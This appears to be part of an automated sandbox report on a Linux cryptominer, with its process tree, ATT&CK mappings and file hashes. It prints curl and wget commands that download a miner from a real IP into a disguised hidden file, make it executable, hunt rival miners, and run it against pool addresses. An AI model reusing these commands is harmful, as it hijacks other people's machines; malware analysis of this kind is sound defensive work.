  curl http://138.197.206.223/.x/xmra64 -o /.cache/.kswapd
  2⤵
  PID:1984
- /usr/bin/wget
  wget http://138.197.206.223/.x/xmra64 -O /.cache/.kswapd
  2⤵
  PID:1985
- /bin/chmod
  chmod +x /.cache/.kswapd
  2⤵
  - File and Directory Permissions Modification
  PID:1986
- /bin/sleep
  sleep 120
  2⤵
  PID:1992
- /bin/mkdir
  mkdir -p /.cache/
  2⤵
  PID:1993
- /usr/bin/chattr
  chattr -i /.cache/
  2⤵
  - Attempts to change immutable files
  PID:1994
- /bin/chmod
  chmod 1755 /.cache/
  2⤵
  - File and Directory Permissions Modification
  PID:1995
- /bin/grep
  grep -v eth0
  2⤵
  PID:2002
- /bin/grep
  grep -v "^-"
  2⤵
  PID:2001
- /bin/grep
  grep -v lan0
  2⤵
  PID:2000
- /bin/grep
  grep -v inet0
  2⤵
  PID:2003
- /bin/grep
  grep -v lano
  2⤵
  PID:2004
- /bin/grep
  grep -v eth1
  2⤵
  PID:1999
- /bin/grep
  grep -v grep
  2⤵
  PID:2005
- /bin/grep
  grep -v defunct
  2⤵
  PID:2006
- /bin/grep
  grep -v l0
  2⤵
  PID:1998
- /bin/grep
  grep -vi aaaaaaaaaa
  2⤵
  PID:2008
- /bin/grep
  grep -vi "java "
  2⤵
  PID:2009
- /bin/grep
  grep -vi jenkins
  2⤵
  PID:2010
- /bin/grep
  grep -v knthread
  2⤵
  PID:2007
- /bin/grep
  grep -vi exim
  2⤵
  PID:2011
- /usr/bin/awk
  awk "{if(\$3>=54.0) print \$11}"
  2⤵
  PID:2012
- /usr/bin/head
  head -n 1
  2⤵
  PID:2013
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1997
- /bin/grep
  grep -v eth0
  2⤵
  PID:2020
- /bin/grep
  grep -v inet0
  2⤵
  PID:2021
- /bin/grep
  grep -v "^-"
  2⤵
  PID:2019
- /bin/grep
  grep -v lano
  2⤵
  PID:2022
- /bin/grep
  grep -v grep
  2⤵
  PID:2023
- /bin/grep
  grep -v lan0
  2⤵
  PID:2018
- /bin/grep
  grep -v defunct
  2⤵
  PID:2024
- /bin/grep
  grep -v python
  2⤵
  PID:2025
- /bin/grep
  grep -v eth1
  2⤵
  PID:2017
- /bin/grep
  grep -v knthread
  2⤵
  PID:2026
- /bin/grep
  grep -vi aaaaaaaaaa
  2⤵
  PID:2027
- /bin/grep
  grep -vi bash
  2⤵
  PID:2028
- /bin/grep
  grep -vi exim
  2⤵
  PID:2029
- /bin/grep
  grep -v l0
  2⤵
  PID:2016
- /usr/bin/awk
  awk "{if(\$3>=0.0) print \$2}"
  2⤵
  PID:2030
- /usr/bin/uniq
  uniq
  2⤵
  PID:2031
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:2015
- /bin/readlink
  readlink /proc/316/exe
  2⤵
  PID:2033
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/316/exe
  2⤵
  PID:2035
- /bin/readlink
  readlink /proc/326/exe
  2⤵
  PID:2037
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/326/exe
  2⤵
  - Attempts to change immutable files
  PID:2039
- /bin/readlink
  readlink /proc/416/exe
  2⤵
  PID:2041
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/416/exe
  2⤵
  PID:2043
- /bin/readlink
  readlink /proc/418/exe
  2⤵
  PID:2045
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/418/exe
  2⤵
  PID:2047
- /bin/readlink
  readlink /proc/421/exe
  2⤵
  PID:2049
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/421/exe
  2⤵
  PID:2051
- /bin/readlink
  readlink /proc/422/exe
  2⤵
  PID:2053
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/422/exe
  2⤵
  PID:2055
- /bin/readlink
  readlink /proc/434/exe
  2⤵
  PID:2057
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/434/exe
  2⤵
  PID:2059
- /bin/readlink
  readlink /proc/440/exe
  2⤵
  PID:2061
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/440/exe
  2⤵
  PID:2063
- /bin/readlink
  readlink /proc/442/exe
  2⤵
  PID:2065
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/442/exe
  2⤵
  PID:2067
- /bin/readlink
  readlink /proc/457/exe
  2⤵
  PID:2069
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/457/exe
  2⤵
  PID:2071
- /bin/readlink
  readlink /proc/462/exe
  2⤵
  PID:2073
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/462/exe
  2⤵
  PID:2075
- /bin/readlink
  readlink /proc/464/exe
  2⤵
  PID:2077
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/464/exe
  2⤵
  - Attempts to change immutable files
  PID:2079
- /bin/readlink
  readlink /proc/471/exe
  2⤵
  PID:2081
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/471/exe
  2⤵
  PID:2083
- /bin/readlink
  readlink /proc/476/exe
  2⤵
  PID:2085
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/476/exe
  2⤵
  - Attempts to change immutable files
  PID:2087
- /bin/readlink
  readlink /proc/485/exe
  2⤵
  PID:2089
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/485/exe
  2⤵
  PID:2091
- /bin/readlink
  readlink /proc/488/exe
  2⤵
  PID:2093
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/488/exe
  2⤵
  PID:2095
- /bin/readlink
  readlink /proc/538/exe
  2⤵
  PID:2097
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/538/exe
  2⤵
  - Attempts to change immutable files
  PID:2099
- /bin/readlink
  readlink /proc/539/exe
  2⤵
  PID:2101
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/539/exe
  2⤵
  PID:2103
- /bin/readlink
  readlink /proc/559/exe
  2⤵
  PID:2105
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/559/exe
  2⤵
  - Attempts to change immutable files
  PID:2107
- /bin/readlink
  readlink /proc/572/exe
  2⤵
  PID:2109
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/572/exe
  2⤵
  PID:2111
- /bin/readlink
  readlink /proc/596/exe
  2⤵
  PID:2113
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/596/exe
  2⤵
  - Attempts to change immutable files
  PID:2115
- /bin/readlink
  readlink /proc/615/exe
  2⤵
  PID:2117
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/615/exe
  2⤵
  - Attempts to change immutable files
  PID:2119
- /bin/readlink
  readlink /proc/616/exe
  2⤵
  PID:2121
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/616/exe
  2⤵
  - Attempts to change immutable files
  PID:2123
- /bin/readlink
  readlink /proc/656/exe
  2⤵
  PID:2125
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/656/exe
  2⤵
  - Attempts to change immutable files
  PID:2127
- /bin/readlink
  readlink /proc/675/exe
  2⤵
  PID:2129
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/675/exe
  2⤵
  PID:2131
- /bin/readlink
  readlink /proc/678/exe
  2⤵
  PID:2133
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/678/exe
  2⤵
  PID:2135
- /bin/readlink
  readlink /proc/682/exe
  2⤵
  PID:2137
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/682/exe
  2⤵
  PID:2139
- /bin/readlink
  readlink /proc/688/exe
  2⤵
  PID:2141
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/688/exe
  2⤵
  - Attempts to change immutable files
  PID:2143
- /bin/readlink
  readlink /proc/693/exe
  2⤵
  PID:2145
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/693/exe
  2⤵
  - Attempts to change immutable files
  PID:2147
- /bin/readlink
  readlink /proc/701/exe
  2⤵
  PID:2149
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/701/exe
  2⤵
  - Attempts to change immutable files
  PID:2151
- /bin/readlink
  readlink /proc/772/exe
  2⤵
  PID:2153
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/772/exe
  2⤵
  PID:2155
- /bin/readlink
  readlink /proc/793/exe
  2⤵
  PID:2157
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/793/exe
  2⤵
  PID:2159
- /bin/readlink
  readlink /proc/890/exe
  2⤵
  PID:2161
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/890/exe
  2⤵
  PID:2163
- /bin/readlink
  readlink /proc/930/exe
  2⤵
  PID:2165
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/930/exe
  2⤵
  PID:2167
- /bin/readlink
  readlink /proc/992/exe
  2⤵
  PID:2169
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/992/exe
  2⤵
  PID:2171
- /bin/readlink
  readlink /proc/994/exe
  2⤵
  PID:2173
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/994/exe
  2⤵
  - Attempts to change immutable files
  PID:2175
- /bin/readlink
  readlink /proc/999/exe
  2⤵
  PID:2177
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/999/exe
  2⤵
  - Attempts to change immutable files
  PID:2179
- /bin/readlink
  readlink /proc/1002/exe
  2⤵
  PID:2181
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1002/exe
  2⤵
  PID:2183
- /bin/readlink
  readlink /proc/1026/exe
  2⤵
  PID:2185
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1026/exe
  2⤵
  PID:2187
- /bin/readlink
  readlink /proc/1031/exe
  2⤵
  PID:2189
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1031/exe
  2⤵
  PID:2191
- /bin/readlink
  readlink /proc/1045/exe
  2⤵
  PID:2193
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1045/exe
  2⤵
  PID:2195
- /bin/readlink
  readlink /proc/1051/exe
  2⤵
  PID:2197
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1051/exe
  2⤵
  - Attempts to change immutable files
  PID:2199
- /bin/readlink
  readlink /proc/1064/exe
  2⤵
  PID:2201
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1064/exe
  2⤵
  PID:2203
- /bin/readlink
  readlink /proc/1068/exe
  2⤵
  PID:2205
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1068/exe
  2⤵
  - Attempts to change immutable files
  PID:2207
- /bin/readlink
  readlink /proc/1072/exe
  2⤵
  PID:2209
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1072/exe
  2⤵
  - Attempts to change immutable files
  PID:2211
- /bin/readlink
  readlink /proc/1075/exe
  2⤵
  PID:2213
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1075/exe
  2⤵
  PID:2215
- /bin/readlink
  readlink /proc/1078/exe
  2⤵
  PID:2217
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1078/exe
  2⤵
  PID:2219
- /bin/readlink
  readlink /proc/1088/exe
  2⤵
  PID:2221
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1088/exe
  2⤵
  PID:2223
- /bin/readlink
  readlink /proc/1092/exe
  2⤵
  PID:2225
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1092/exe
  2⤵
  PID:2227
- /bin/readlink
  readlink /proc/1101/exe
  2⤵
  PID:2229
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1101/exe
  2⤵
  PID:2231
- /bin/readlink
  readlink /proc/1116/exe
  2⤵
  PID:2233
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1116/exe
  2⤵
  PID:2235
- /bin/readlink
  readlink /proc/1121/exe
  2⤵
  PID:2237
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1121/exe
  2⤵
  PID:2239
- /bin/readlink
  readlink /proc/1125/exe
  2⤵
  PID:2241
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1125/exe
  2⤵
  PID:2243
- /bin/readlink
  readlink /proc/1129/exe
  2⤵
  PID:2245
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1129/exe
  2⤵
  - Attempts to change immutable files
  PID:2247
- /bin/readlink
  readlink /proc/1133/exe
  2⤵
  PID:2249
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1133/exe
  2⤵
  - Attempts to change immutable files
  PID:2251
- /bin/readlink
  readlink /proc/1137/exe
  2⤵
  PID:2253
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1137/exe
  2⤵
  PID:2255
- /bin/readlink
  readlink /proc/1141/exe
  2⤵
  PID:2257
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1141/exe
  2⤵
  PID:2259
- /bin/readlink
  readlink /proc/1146/exe
  2⤵
  PID:2261
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1146/exe
  2⤵
  PID:2263
- /bin/readlink
  readlink /proc/1150/exe
  2⤵
  PID:2265
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1150/exe
  2⤵
  PID:2267
- /bin/readlink
  readlink /proc/1151/exe
  2⤵
  PID:2269
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1151/exe
  2⤵
  PID:2271
- /bin/readlink
  readlink /proc/1154/exe
  2⤵
  PID:2273
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1154/exe
  2⤵
  - Attempts to change immutable files
  PID:2275
- /bin/readlink
  readlink /proc/1156/exe
  2⤵
  PID:2277
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1156/exe
  2⤵
  - Attempts to change immutable files
  PID:2279
- /bin/readlink
  readlink /proc/1160/exe
  2⤵
  PID:2281
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1160/exe
  2⤵
  - Attempts to change immutable files
  PID:2283
- /bin/readlink
  readlink /proc/1167/exe
  2⤵
  PID:2285
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1167/exe
  2⤵
  - Attempts to change immutable files
  PID:2287
- /bin/readlink
  readlink /proc/1170/exe
  2⤵
  PID:2289
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1170/exe
  2⤵
  - Attempts to change immutable files
  PID:2291
- /bin/readlink
  readlink /proc/1173/exe
  2⤵
  PID:2293
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1173/exe
  2⤵
  - Attempts to change immutable files
  PID:2295
- /bin/readlink
  readlink /proc/1174/exe
  2⤵
  PID:2297
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1174/exe
  2⤵
  PID:2299
- /bin/readlink
  readlink /proc/1179/exe
  2⤵
  PID:2301
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1179/exe
  2⤵
  PID:2303
- /bin/readlink
  readlink /proc/1187/exe
  2⤵
  PID:2305
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1187/exe
  2⤵
  PID:2307
- /bin/readlink
  readlink /proc/1190/exe
  2⤵
  PID:2309
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1190/exe
  2⤵
  - Attempts to change immutable files
  PID:2311
- /bin/readlink
  readlink /proc/1191/exe
  2⤵
  PID:2313
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1191/exe
  2⤵
  PID:2315
- /bin/readlink
  readlink /proc/1192/exe
  2⤵
  PID:2317
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1192/exe
  2⤵
  PID:2319
- /bin/readlink
  readlink /proc/1193/exe
  2⤵
  PID:2321
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1193/exe
  2⤵
  PID:2323
- /bin/readlink
  readlink /proc/1197/exe
  2⤵
  PID:2325
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1197/exe
  2⤵
  - Attempts to change immutable files
  PID:2327
- /bin/readlink
  readlink /proc/1200/exe
  2⤵
  PID:2329
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1200/exe
  2⤵
  - Attempts to change immutable files
  PID:2331
- /bin/readlink
  readlink /proc/1232/exe
  2⤵
  PID:2333
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1232/exe
  2⤵
  PID:2335
- /bin/readlink
  readlink /proc/1236/exe
  2⤵
  PID:2337
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1236/exe
  2⤵
  PID:2339
- /bin/readlink
  readlink /proc/1264/exe
  2⤵
  PID:2341
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1264/exe
  2⤵
  - Attempts to change immutable files
  PID:2343
- /bin/readlink
  readlink /proc/1265/exe
  2⤵
  PID:2345
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1265/exe
  2⤵
  - Attempts to change immutable files
  PID:2347
- /bin/readlink
  readlink /proc/1278/exe
  2⤵
  PID:2349
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1278/exe
  2⤵
  - Attempts to change immutable files
  PID:2351
- /bin/readlink
  readlink /proc/1290/exe
  2⤵
  PID:2353
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1290/exe
  2⤵
  - Attempts to change immutable files
  PID:2355
- /bin/readlink
  readlink /proc/1296/exe
  2⤵
  PID:2357
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1296/exe
  2⤵
  PID:2359
- /bin/readlink
  readlink /proc/1306/exe
  2⤵
  PID:2361
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1306/exe
  2⤵
  - Attempts to change immutable files
  PID:2363
- /bin/readlink
  readlink /proc/1313/exe
  2⤵
  PID:2365
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1313/exe
  2⤵
  PID:2367
- /bin/readlink
  readlink /proc/1318/exe
  2⤵
  PID:2369
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1318/exe
  2⤵
  PID:2371
- /bin/readlink
  readlink /proc/1340/exe
  2⤵
  PID:2373
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1340/exe
  2⤵
  PID:2375
- /bin/readlink
  readlink /proc/1355/exe
  2⤵
  PID:2377
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1355/exe
  2⤵
  PID:2379
- /bin/readlink
  readlink /proc/1384/exe
  2⤵
  PID:2381
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1384/exe
  2⤵
  PID:2383
- /bin/readlink
  readlink /proc/1482/exe
  2⤵
  PID:2385
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1482/exe
  2⤵
  PID:2387
- /bin/readlink
  readlink /proc/1507/cwd
  2⤵
  PID:2388
- /bin/cat
  cat /proc/1507/comm
  2⤵
  PID:2389
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" //kdumpy
  2⤵
  PID:2391
- /bin/readlink
  readlink /proc/1509/cwd
  2⤵
  PID:2392
- /bin/cat
  cat /proc/1509/comm
  2⤵
  PID:2393
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump
  2⤵
  - Attempts to change immutable files
  PID:2395
- /bin/readlink
  readlink /proc/1510/cwd
  2⤵
  PID:2396
- /bin/cat
  cat /proc/1510/comm
  2⤵
  PID:2397
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma
  2⤵
  PID:2399
- /bin/readlink
  readlink /proc/1555/exe
  2⤵
  PID:2401
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1555/exe
  2⤵
  PID:2403
- /bin/readlink
  readlink /proc/1992/exe
  2⤵
  PID:2405
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1992/exe
  2⤵
  PID:2407
- /usr/bin/cut
  cut -c 1-32
  2⤵
  PID:2411
- /usr/bin/md5sum
  md5sum /.cache/.kswapd
  2⤵
  PID:2410
- /usr/bin/cut
  cut -c 1-32
  2⤵
  PID:2414
- /usr/bin/md5sum
  md5sum /.cache/.kswapd
  2⤵
  PID:2413
- /usr/bin/wc
  wc -l
  2⤵
  PID:2418
- /bin/grep
  grep x86_64
  2⤵
  PID:2417
- /usr/bin/curl
  curl http://138.197.206.223/.x/xmra64 -o /.cache/.kswapd
  2⤵
  PID:2420
- /usr/bin/wget
  wget http://138.197.206.223/.x/xmra64 -O /.cache/.kswapd
  2⤵
  PID:2421
- /bin/chmod
  chmod +x /.cache/.kswapd
  2⤵
  - File and Directory Permissions Modification
  PID:2422

/.cache/.kswapd
/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B
1⤵
PID:1987

/.cache/.kswapd
/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B
1⤵
PID:2423

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/.jz2HKyZ

Filesize
8B

MD5
0931f8cb1ce93c89f17cb2630d6e8419

SHA1
999a4c9e109d175bbc6a597a9d7b35679f5877a4

SHA256
e12f1c8d8403836b567a37032bb7494ff8b55cd4acfb55208d860218f0bf9946

SHA512
d1809cb8486febf865c11e962fdaf8709ab4f6cdeeed245f704fcf6a9f521ef0565af91467ab004309a5fd852750da7a69f1661370b20fc2fce641a9519c897a

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads